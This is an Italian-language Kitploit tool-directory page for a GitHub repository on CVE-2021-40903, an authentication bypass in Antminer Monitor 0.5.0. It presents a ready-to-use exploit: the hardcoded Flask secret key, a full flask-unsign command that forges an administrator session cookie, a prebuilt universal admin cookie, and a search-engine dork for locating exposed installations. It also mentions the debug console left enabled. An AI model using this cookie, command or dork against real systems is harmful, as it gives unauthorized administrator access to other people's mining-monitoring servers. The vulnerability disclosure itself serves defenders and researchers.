Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-40903 — CVE-2021-40903 | Kitploit
Strumenti/GitHubGitHub/vulnz/cve-2021-40903
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubvulnz/cve-2021-40903

CVE-2021-40903

CVE-2021-40903

Vedi Repository
4 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Titolo dell'exploit: Antminer Monitor 0.5.0 - Bypass dell'autenticazione

CVE: CVE-2021-40903

Data: 09/06/2021

Dork:https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22 Autore dell'exploit: CQR.company / Vulnz.

Homepage del fornitore: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor

Link del software: https://github.com/anselal/antminer-monitor, https://soulis.tech/

Versione: 0.5.0

Testato su: Windows, Linux, Macos

Il software è comunemente usato per monitorare gli antminer e può essere facilmente trovato su ZoomEye ( 800), Shodan ( 500). Per ora questo è lo strumento di monitoraggio degli antminer più popolare. La vulnerabilità in Antminer Monitor esiste a causa di una backdoor o di una configurazione errata effettuata

dallo sviluppatore all'interno del file delle impostazioni nel server Flask.

Il file delle impostazioni contiene una stringa segreta predefinita, che dovrebbe essere generata casualmente, tuttavia è statica in questa build.antminer-monitor/settings.py at 5c62e1064af30674bacb9e1917d5980efbde1fcd · anselal/antminer-monitor · GitHub https://github.com/anselal/antminer-monitor/blob/5c62e1064af30674bacb9e1917d5980efbde1fcd/config/settings.py

La chiave segreta è 'super secret key'.

Sulla base di queste informazioni possiamo creare cookie di bypass dell'autorizzazione.

Usando il software flask-unsing possiamo generare un cookie che ti fornirà accesso amministratore.

flask-unsign --sign --cookie "{'_fresh': True, '_id': b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6', '_user_id': '1', 'csrf_token': b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret key" Inoltre, puoi usare questo cookie universale per accedere all'interfaccia web dell'applicazione Flask.

Questo cookie può funzionare su tutti i sistemi nel campo "session".

.eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU

Inoltre, DEBUG = True il che significa che /console funziona, ma richiede il PIN.

Scarica lo strumento